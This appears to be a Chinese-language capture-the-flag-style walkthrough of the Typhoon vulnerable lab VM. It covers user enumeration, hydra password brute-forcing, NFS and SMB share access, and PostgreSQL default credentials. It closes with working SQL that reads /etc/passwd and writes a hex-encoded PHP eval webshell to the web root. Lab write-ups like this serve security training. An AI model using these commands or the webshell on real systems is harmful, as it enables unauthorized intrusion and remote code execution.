前言&靶机简介
这个靶机挺多漏洞 , 知识点很广 , 所以决定自己来打一遍 , 算是复习一些很久前的知识点 , 就从一个端口一个端口来渗透吧 , 看看有什么知识点
端口扫描
文章插图
25端口用户名枚举为啥选这个端口呢 , 因为后面要渗透21和22端口很大可能会爆破 , 25端口版本为Postfix smtpd , 可以进行用户名枚举 , 为后面爆破提供方便
文章插图
存在root、typhoon、admin这三个用户
未授权访问使用nc连接25端口不过貌似不能发邮件
21端口首先在网上搜了一下vsftpd 3.0.2这个版本有没有什么漏洞 , 没有结果 , 于是尝试一些通用的基本操作
ftp匿名访问探测了一下发现存在ftp匿名访问
文章插图
于是登录一下 , 查看当前路径及列目录
文章插图
尝试上传文件
文章插图
发现权限不允许 , 所以21端口暂时没有其它利用方式
ftp爆破因为知道了存在以上用户 , 所以使用hydra爆破
文章插图
得到了typhoon的密码继续爆破admin的密码 , 同样成功爆破
文章插图
root爆破无果
22端口账号密码和21端口一样
文章插图
文章插图
111&2049端口这是一个NFS服务 , 测试一下是否存在未授权访问允许挂载文件 , 确实存在
文章插图
查询目标NFS共享目录情况
showmount -e 192.168.80.4
文章插图
然后挂载typhoon目录
mount -t nfs 192.168.80.4:/typhoon /tmp/mut/
文章插图
445端口使用enum4linux枚举目标共享信息
enum4linux 192.168.80.4
文章插图
也顺便列出了存在的用户名typhoon、admin、postfixuser
文章插图
发现允许空账户、空密码登录 , 共享文件typhoon远程挂载 , 密码随便输就行
文章插图
文章插图
5432端口这个端口是PostgreSQL数据库 , 尝试爆破一下账号密码账号密码都为postgres
文章插图
读/etc/passwd
DROP TABLE if EXISTS ghtwf01;CREATE TABLE ghtwf01(t TEXT);COPY ghtwf01 FROM '/etc/passwd';SELECT * FROM ghtwf01;
文章插图
写一句话【typhoon靶机渗透】创建OID , 清空内容
SELECT lo_create(4444);delete from pg_largeobject where loid=4444;
将一句话木马16进制编码为3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E
插入insert into pg_largeobject (loid,pageno,data) values(4444, 0, decode('3C3F70687020406576616C28245F504F53545B277368656C6C275D293B203F3E', 'hex'));
导出数据到指定文件SELECT lo_export(4444, '/var/www/html/shell.php');
文章插图
成功getshell
推荐阅读
- 内网渗透神器Cobalt Strike,英雄联盟中的无尽之刃
- Web渗透流程、Windows基础、注册表及黑客常用DOS命令
- phpmyadmin渗透思路整理
- 内网渗透测试——端口转发与内网代理渗透测试实验报告
- 社会工程学 渗透攻击实例-邪恶的CSRF
- 新手学习电脑渗透的基础知识掌握
- kali渗透:web登录密码嗅探神器SSLstrip,这样使用才是正确姿势
- 渗透成功后收集目标系统的信息
- 渗透攻击实例-完整的实战演练
- 大黑客教你如何手工渗透测试Web应用程序!!